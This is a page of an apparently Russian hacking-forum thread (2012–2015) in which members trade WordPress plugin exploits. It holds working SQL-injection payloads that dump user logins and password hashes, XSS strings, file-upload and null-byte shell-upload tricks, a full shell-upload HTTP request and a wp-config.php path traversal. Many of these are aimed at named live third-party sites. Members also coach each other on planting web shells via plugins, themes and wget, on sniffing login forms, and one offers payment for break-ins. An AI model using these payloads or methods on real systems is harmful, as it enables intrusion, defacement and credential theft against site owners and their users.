PDA

Просмотр полной версии : [ Обзор уязвимостей WordPress ]


Страницы : 1 [2]

ukrpunk
19.10.2012, 20:31
# Exploit Title: ripe-hd-player SQL-Inj

# Date: 19.10.2012

# Exploit Author:ukrpunk

# Vendor Homepage: find by yourself

# Software Link: find by yourself

# Version: don't know

# Tested in: web

# Dork:inurl:"/plugins/ripe-hd-player"

# Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--

# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--

qaz
23.10.2012, 19:40
народ, кто в курсе как залить шелл в wp 3.4.2 ?

Ups
23.10.2012, 19:42
народ, кто в курсе как залить шелл в wp 3.4.2 ?


Через шаблоны.

3ak.aT
25.10.2012, 01:18
Кто нибудь объяснит как раскрутить эту тему:


################################################## #################################



# Exploit Title: wordpress Count per Day Cr oss Site Scripting Vulnerability

#

# Google Dork:inurl:/wp-content/plugins/count-per-day

#

# Date: 08/24/2012

#

# Author: Crim3R

#

# Version 3.2.3

#

# Vendor Home : http://downloads.wordpress.org/plugin/count-per-day.3.2.3.zip

#

# Tested on: all

#

################################################## #################################



$

$Author will be not responsibleforany damage.

$

################################################## #################################





========================================

first notes.php is not restricted to adminan danyone can access it directty by

browser=>an attacker can add notes witch



can be html codes=>its Stored Xss

gotoWP-path/wp-content/plugins/count-per-day/notes.php

in the notes section add html codeandclick Add

D3M0:

http://www.christinedesavino.com/blog/wp-content/plugins/count-per-day



http://www.dhakadakshinghsc.com/wp-content/plugins/count-per-day/



www.watansport.net/ara/wp-content/plugins/count-per-day/





===============Crim3R@Att.Net===========



$home= %00

thanks to:2MzRp-Mikili-0x0ptim0us-iC0d3R-farbodmahini&Amir

z0mbyak
25.10.2012, 01:46
народ, кто в курсе как залить шелл в wp 3.4.2 ?


Через плагины)

z0mbyak
25.10.2012, 19:21
Есть какой нить сканер под wp который ищет уязвимости в плагинах?


Вот тут найдешь полюбас! (http://bit.ly/PSlHQA)

DyukiN
28.10.2012, 21:27
подскажите exploit под WordPress 3.4.2

winstrool
28.10.2012, 22:59
WordPress "All-in-One-SEO-Pack V 1.6.15.2" component ActiveXSS

Уязвим параметр $_POST['aiosp_menulabel']

Эксплyатация:

В админ панели при заполнение полей, поле

Меню метки: передаем


alert("5")


Дорк: "inurl:/plugins/all-in-one-seo-pack/"

Уязвимый код:

Намеренно пока не выкладываю

P.S:Чуcтвую запах sql-injection.

Сайт разработчика: _ht_p://sempe[antisearch]rplugins.com/

P.S: надеюсь не боян, нашел сегодня на последней фри-версии!

qaz
07.11.2012, 18:42
Через плагины)




Через шаблоны.


а можно хоть прмер или где про ето почитать?

z0mbyak
08.11.2012, 01:26
а можно хоть прмер или где про ето почитать?


Скачай любой плагин для вп и закинь в архив свой шелл...


Через шаблоны.


Через редактирование шаблонов измени шаб и залейся через wget например...

VY_CMa
08.11.2012, 01:39
а можно хоть прмер или где про ето почитать?


Пакуем шелл в зип.

Например rss_class.php => rss_class.zip

Добавляем плагин, выбираем наш архив.

Готово.

/wp-content/plugins/rss_class/

MaxFast
08.11.2012, 08:55
Скачай любой плагин для вп и закинь в архив свой шелл...
Через редактирование шаблонов измени шаб и залейся через wget например...


Через шаблоны не всегда удается залится, ибо могут быть урезаны права на запись.

3ak.aT
22.11.2012, 02:26
Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities


wordpress tdo-mini-forms plugin(rfu/rfd)Vulnerabilities



------------------------------------------------------------

wordpress tdo-mini-forms plugin(remote file upload/remote file deletion)Vulnerabilities

Auther:Cold z3ro,www.hackteach.org,www.s3curi7y.c om

Anonymous=>You are the man





# Remote file upload :



wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=



file extension:file.php%00;.jpg

uploaded path:

wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg



Example to uploaded path:

wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg







# Remote file Deletion



=>Note:useing Any http POST header modifier.



tdomf_form_id=1;

deletefile[] =1;

filepath=$varibale(wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg)

index=NULL



Example to result:

wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=



Eof;



# 1337day.com/exploit/19776 [2012-11-21]



Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?

Unknown
05.12.2012, 01:42
Нашел уязвимость в плагине wp, может кому-то будет полезная.

Wordpress "count-per-day v3.2.4" plugin PHP Code Execution

В админке в настройках плагина параметр "Последние счетчики - Дни:"


7);phpinfo(

Результат:


/wp-content/plugins/count-per-day/ajax.php?f=count&time=9999999999

MaxFast
10.12.2012, 21:17
WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

[+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS

[+] Found by Angel Injection

[+] Version: 1.3.11

Exploit:


http://localhost/?s=[xss here]&x=0&y=0

http://localhost/?s=">alert(1)&x=0&y=0

MaxFast
17.12.2012, 20:06
Wordpress 3.5 Active XSS


Нужны права администратора.

Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:


">alert('XSS Test')

http://makescreen.ru/ii/a697d2a65ef93af9a3b111d87350fe.jpg (http://makescreen.ru/screen/a697d2a65ef93af9a3b111d87350fe)

Проверить можно тут (http://nz-quest.ru/wp/?p=1).


L: test
P: test

(c) MaxFast aka n3m1s

VY_CMa
17.12.2012, 20:19
MaxFast, бага отработала под акком админа, под гостем идет экранирование.

MaxFast
18.12.2012, 17:54
Wordpress 3.5 Full Path Disclosure

Exploit:


localhost/?cat[]=1

Result:


Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735

Example:


_tpp://sergeybiryukov.ru/?cat[]=1
_ttp://wpsymposium.com/?cat[]=1

Found by MaxFast aka n3m1s

Unknown
20.12.2012, 01:07
[B]Wordpress Error - I can not get the source code for your site."[/COLOR]);

}

preg_match_all("| array given in (.*?)wp-includes|i",$source,$m);

foreach($m[1] as$match) {

echo"".$match."";

}

}

?>



Wordpress 3.5 Full Path Disclosure Exploit | By n3m1s and zed0x



body { background-color: #111; color: #FFF; font-family: Verdana; font-size: 16px; }

input { background-color: #222; color: #FFF; font-family: Verdana; font-size: 16px; padding: 5px; border: 0px; }

.error { margin-top: 25px; color: red; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }

.result { margin-top: 25px; color: green; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }



Target:



URL not valid");

getCat($URL);

}

?>



[/COLOR]
[/PHP]
NOTICE: this exploit for web, do not forget about copyright!

BigBear
20.12.2012, 07:36
Ребят, я всё понимаю "активность" и всё такое, но я не вижу смысла в эксплойте из одной строчки, максимум что делающего - раскрывающего пути. Да ещё только 1 метод представлен. Бред.

У меня к Вам предложение - впихините в код все известные методы раскрытия пути на WordPress - получите и от меня +, и от других форумчан спасибо.

В противном случае придётся удалить топик за ненадобностью. Согласитесь - кому захочется качать php exploit, копировать на тачку, запускать, когда просто можно сделать 1 простое дейсвтие в адресной строке даже по памяти ??

bredbaraded
03.01.2013, 18:41
Wordpress 3.5 Active XSS



Нужны права администратора.
Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:

">alert('XSS Test')

http://makescreen.ru/ii/a697d2a65ef93af9a3b111d87350fe.jpg (http://makescreen.ru/screen/a697d2a65ef93af9a3b111d87350fe)
Проверить можно тут (http://nz-quest.ru/wp/?p=1).

L: test
P: test

(c) MaxFast aka n3m1s


C правами админа и iframe можно вставить.

pharm_all
12.01.2013, 22:15
Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.


+# This affects W3 Total Cache

3ak.aT
21.02.2013, 22:21
Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability


# Author => Zikou-16
# Download plugin : http://wordpress.org/extend/plugins/slidedeck2/

#=> Exploit Info :
------------------
# The attacker can inject HTML codes & inject a simple file uploader to upload shell
------------------

------------------
#=> XSS
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

inj3ct u'r HTML codes in (Text) then click Copy To Clipboard...

screenshot #=> http://i49.tinypic.com/1zgqngx.png

------------------
#=> Shell Upload
------------------

http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

inj3ct u'r simple file uploader & upload u'r shell

screenshot #=> http://i45.tinypic.com/1426mhg.jpg

------------------
#=> Demos
------------------

http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.

Вопрос: какие идеи?

© Источник (http://www.1337day.com/exploit/20235)

Limbaro
27.03.2013, 21:23
wordpress

Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...

icq: 640831391

Mastahh
25.04.2013, 02:12
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?

Есть папка uploads, где видно все файлы. Значит где то есть uploader?

strelok20094
09.05.2013, 18:53
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?


Просканируй сайт этой прогой Web Vulnerability Scanner 8

там будет папка wp-content/plugins Так вот в ней и лежал плагины

Unknowhacker
31.05.2013, 14:27
Версия 3.5 и 3.5.1

Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:


';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ">'>alert(String.fromCharCode(88,83,83))

после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.

Br@!ns
02.06.2013, 00:44
все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?

EDIT

Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)

psihoz26
27.06.2013, 14:12
WordPress marker_listings.xml SQL injection

Google dork:


inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="

Vulnerable script:


h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_N AME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+

J_thief
27.08.2013, 22:42
Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF

Сам плагин, версии 2.31

psihoz26
16.09.2013, 00:08
очередная возможность узнать версию вордпресс

файл redame.html в корневой папке с блогом

пример

http://www.lasalle.edu/readme.html

http://www.blackandabroad.com/readme.html

BOSS
01.11.2013, 06:16
Извиняюсь если не туда пишу, можно ли залить шелл на вордпресс 3.7.1 если нет прав на запись файлов?

qaz
10.11.2013, 21:06
Google dork:

inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="

Vulnerable script:

h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_N AME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+



это до какой версии работало?

Ravenous
11.12.2013, 19:24
formcraft Plugin Sql Injection

файл /wp-content/plugins/formcraft/form.php


get_results("SELECT * FROM$table_builderWHERE id=$_GET[id]","ARRAY_A");

$con=stripslashes($myrows[0]['con']);

$con=json_decode($con,1);



inurl:"plugins/formcraft/"

hpol
20.12.2013, 14:11
какой есть еще способ залиться в wp ?

при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.

BigBear
22.12.2013, 21:56
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.


Сейчас как раз дописываю одну вещь по аплоаду в WP.

Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.

vr4nonymous
27.01.2014, 16:56
Custom Content Type Manager


url : http://yoursite.com/wp-content/plugins/custom-content-type-manager/ajax-controllers/download_def.php

скачать .json

вид Admin Email

xPriZrAkx
30.01.2014, 13:06
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.


Когда просит пасс итд все равно все залилось Пробуй

SuNDowN
01.02.2014, 18:17
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities


"@$uploadfile"));

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch,CURLOPT_HTTPHEADER,$headers);

$postResult=curl_exec($ch);

curl_close($ch);

print"$postResult";

?>

©Взято от Сюда (http://1337day.com/exploit/21789)

Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста:


http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt
http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt

Домены именно той версии которую требует уязвимость.

grimnir
15.02.2014, 02:19
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1

Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает

Способ с 2 админами тоже не катит

Sum.cogitans
15.02.2014, 13:31
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1
Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает
Способ с 2 админами тоже не катит


Редактировать а не устанавливать плагины. Может быть проверка контрольной суммы, так что выбирать плагин с кол-вом строк >=, чем в шеле.

P.s. Ну и сам шелл возьми из паблика, с минимальным кол-вом строк, потом свой перезальешь.

Fooog
16.02.2014, 17:50
нет прав на запись файлов темы


Также просит пароль от FTP? Если да, значит шелл уже залился.

grimnir
17.02.2014, 01:12
Сейчас как раз дописываю одну вещь по аплоаду в WP.
Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.


BigBear помог залить шелл , огромная благодарность!

McNamara
03.03.2014, 15:17
хм

Народ, а кто бы мог написать обработчик експа CKEditor 4.0 http://1337day.com/exploit/20318 ? Сорец на perl есть, с какой то ошибкой. Ну, и само собой что бы он обрабатывал по списку. ( ясен пень что не за бесплатно ) .

agentru
17.03.2014, 01:16
Друзья такой вопрос.

Стянул куки админа с сайта на wordpress 2.3.3

Авторизировался под ним, но в админку зайти не могу, так как cтоит http basic авторизация на папку wp-admin.

Подскажите, какие могут быть дальнейшие действия?

Unknowhacker
17.03.2014, 12:51
Что можете посоветовать для версии 3.8.1, при сканировании wpsscan нет уязвимых плагинов.

reuvenmatbil
22.03.2014, 12:47
подскажите кто знает

wp-content/plugins/bbpress/ -уязвимость показал впскан

что поставить после bbpress/?

при простом открытии -пустая страница, если на подобе такого подставить topic.php?id[]=12&replies=3

пишет страница не найдена и ошибка Warning: session_start() [function.session-start]: open(/

Toto Riina
30.03.2014, 16:20
есть доступы к ftp и хостингу , где можно узнать пароль от админки ? если не затруднит в личку

sara_luc
08.04.2014, 23:04
Toto Riina said:
есть доступы к ftp и хостингу , где можно узнать пароль от админки ? если не затруднит в личку


либо через базу узнавай хеш,либо тупо сниффер на форму логина и пароля ставь

jangle
10.04.2014, 09:10
to BigBear


Сейчас как раз дописываю одну вещь по аплоаду в WP. Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.


Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?

BigBear
12.04.2014, 19:15
to BigBear
Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?


Версии с 1.0 по 3.8.6 - специально ставил каждую и переписывал сплойт под англо/ру/ино язычные сайты.

В паблике такого не найдёшь.

Протестировать нигде. Но в рамках паблик-ачат-тестирования - пару сайтов пробью.

Unknown
16.04.2014, 05:27
Кто-нибудь может пояснить эту уязвимость - http://1337day.com/exploit/22012 ? В частности Directory Traversal/Arbitrary code execution/Arbitrary File read. Сколько не читал, не проникнусь, что и как делается.

simadm
18.05.2014, 22:15
а есть какие нибудь софты для проверки на уязвимость? актуальные и хорошие. так как в наше время вроде уже хрен найдешь с уязвимостью +(

winstrool
05.06.2014, 13:08
exploit cforms 14.6 shell upload

Плагин: cforms 14.6 - последняя версия на сегодня!

shell upload

оффициальный сайт:


_ttp://www.deliciousdays.com/cforms-plugin/


При настройках по умолчанию и с формой для заливки файлов, льет:


localhost/wp-content/plugins/cforms/noid-shell.php


для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.

look2009
12.08.2014, 01:41
Dork : revslider.php "index of"

Wordpress Slider Revolution Responsive

gas896
12.08.2014, 16:52
[QUOTE="look2009"]
Dork : revslider.php "index of"
Wordpress Slider Revolution Responsive

Bahamut
21.08.2014, 10:17
Плагин:
cforms 14.6
- последняя версия на сегодня!
shell upload
оффициальный сайт:
При настройках по умолчанию и с формой для заливки файлов, льет:
для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.


Видел эти шеллы, но как лить?

SuNDowN
29.09.2014, 18:25
Видел эти шеллы, но как лить?


Аналогично, ковырял так и не понял как лить, а шеллы встречаются довольно часто, находил на забугор форумах описание, о том, что нужно капать в сторону файла: lib_ajax.php, а именно переменную " r " или " rs " где то здесь:


functionsajax_handle_client_request() {

global$sajax_export_list;

$mode="";

if (! empty($_GET["rs"]))

$mode="get";

if (!empty($_POST["rs"]))

$mode="post";

if (empty($mode))

return;

$target="";

### 10.02. Added header

header('Content-Type: text/javascript');

header('X-Content-Type-Options: nosniff');

if ($mode=="get") {

### Bust cache in the head

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");### Date in the past

header("Last-Modified: ".gmdate("D, d M Y H:i:s") ." GMT");

### always modified

header("Cache-Control: no-cache, must-revalidate");### HTTP/1.1

header("Pragma: no-cache");### HTTP/1.0

$func_name= ($_GET["rs"] );### 10.2.2012 sajax_sanitize removed

if (! empty($_GET["rsargs"]))

$args= ($_GET["rsargs"] );### 10.2.2012 sajax_sanitize removed

else

$args= array();

}

else {

$func_name= ($_POST["rs"] );### 10.2.2012 sajax_sanitize removed

if (! empty($_POST["rsargs"]))

$args= ($_POST["rsargs"] );### 10.2.2012 sajax_sanitize removed

else

$args= array();

}

winstrool
07.10.2014, 02:16
Уязвимость в шаблонах для WordPress от автора "ronangelo" пасивная XSS

его темы можно идентифецировать по файлу readme.txt в корне темы:


http://localhost/wp-content/themes/asteroid/readme.txt



Примеры уязвимых сайтов:


_ttps://wp-themes.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28%22123 %22%29;%3C/script%3E
_ttp://rwandanationalparks.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://www.serpsherpa.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://ramkrista.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E


сам уязвимый код:




.mceContentBody {width: px;}

статья, как лить шелл в WP при XSS:


_ttp://habrahabr.ru/company/dsec/blog/194282/

po3t
20.10.2014, 01:37
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл

nick_sale
20.10.2014, 04:21
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл


попробуй подставить путь,должно открыть окно загрузки плагинов

/wp-admin/update.php?action=upload-plugin

SuNDowN
20.10.2014, 13:09
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл


Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:

domain/wp-content/uploads/shell.php

или

domain/wp-content/uploads/2014/10/shell.php

в 99% случаях заливается.

po3t
20.10.2014, 20:13
попробуй подставить путь,должно открыть окно загрузки плагинов
/wp-admin/update.php?action=upload-plugin


не помогло пишет недостаточно прав


Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
domain/wp-content/uploads/shell.php
или
domain/wp-content/uploads/2014/10/shell.php
в 99% случаях заливается.


нету пункта установка тем, могу заливать только медиафайлы

Есть у кого еще идеи?

djumiksc
26.10.2014, 12:24
Есть у кого еще идеи?


Я так понимаю, что у тебя доступ в админку юзера без админских прав.

Скорей всего это редактор.

Попробуй сделать следующее:

Создай любой пост (по теме блога) и пихни в него код




twentythirteen - это имя темы, замени его на свою.

Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)

Шелл доступен по адресу

http://site.com/?p=123123123&cmd=id

попугай
03.11.2014, 02:39
Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код



twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id


разве там нет anti-csrf хеша ?

grimnir
20.01.2015, 14:01
https://wpvulndb.com/

ежедневное обновление уязвимостей вп

grimnir
08.02.2015, 10:01
https://github.com/dionach/CMSmap

CMSmap сканер уязвимостей для популярных CMS WordPress, Joomla, Drupal.

По сути,аналог WPScan , только можно использовать на Windows + поддержка веб-шелла.

grimnir
05.03.2015, 14:02
https://github.com/joren485/WP-Slimstat-SQLI

скрипт для эксплутации бага WP-Slimstat

http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

https://github.com/delvelabs/vane GPL форк известного сканера WPScan

winstrool
18.03.2015, 22:06
MAC PHOTO GALLERY v. 2.7

MAC PHOTO GALLERY

dork: inurllugins/mac-dock-gallery/ download

@version:2.7

Уязвимый код:


$file=dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];

header('Content-Description: File Transfer');

header('Content-Type: application/octet-stream');

header('Content-Disposition: attachment; filename='.basename($fi le));

header('Content-Transfer-Encoding: binary');

header('Expires: 0');

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');

header('Pragma: public');

header('Content-Length: '.filesize($file));

ob_clean();

flush();

readfile($file);

POC:


_ttp://rolfeckel.com/blog/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php


PATCH:

https://wordpress.org/plugins/mac-dock-gallery/other_notes/

TacticiaN
21.04.2015, 17:23
Sorry for my English

does any body know how to use the latest revslider exploit

to upload shell

Reference: https://wpvulndb.com/vulnerabilities/7540

Reference: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

Reference: http://marketblog.envato.com/general/affected-themes/

Reference: http://packetstormsecurity.com/files/129761/

Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1579

Reference: http://osvdb.org/109645

Reference: http://www.exploit-db.com/exploits/34511/

Reference: http://www.exploit-db.com/exploits/35385/

Reference: http://www.exploit-db.com/exploits/36039/

Thanks

faza02
27.04.2015, 12:54
WordPress 4.2 stored XSS


*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:



This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html

ICQ Hool
29.04.2015, 16:31
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability


WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22even t%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C %22gallery_title%22%3A%22folder_name%22%2C%22conte xt%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f 94=admin%7C1399203127%7C70f668b775581773d1500b1b81 62de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #

Подскажите пожалуйста как этим чудом пользоваться?

faza02
29.04.2015, 16:37
ICQ Hool said:
↑ (https://antichat.live/posts/3841830/)
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability


WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
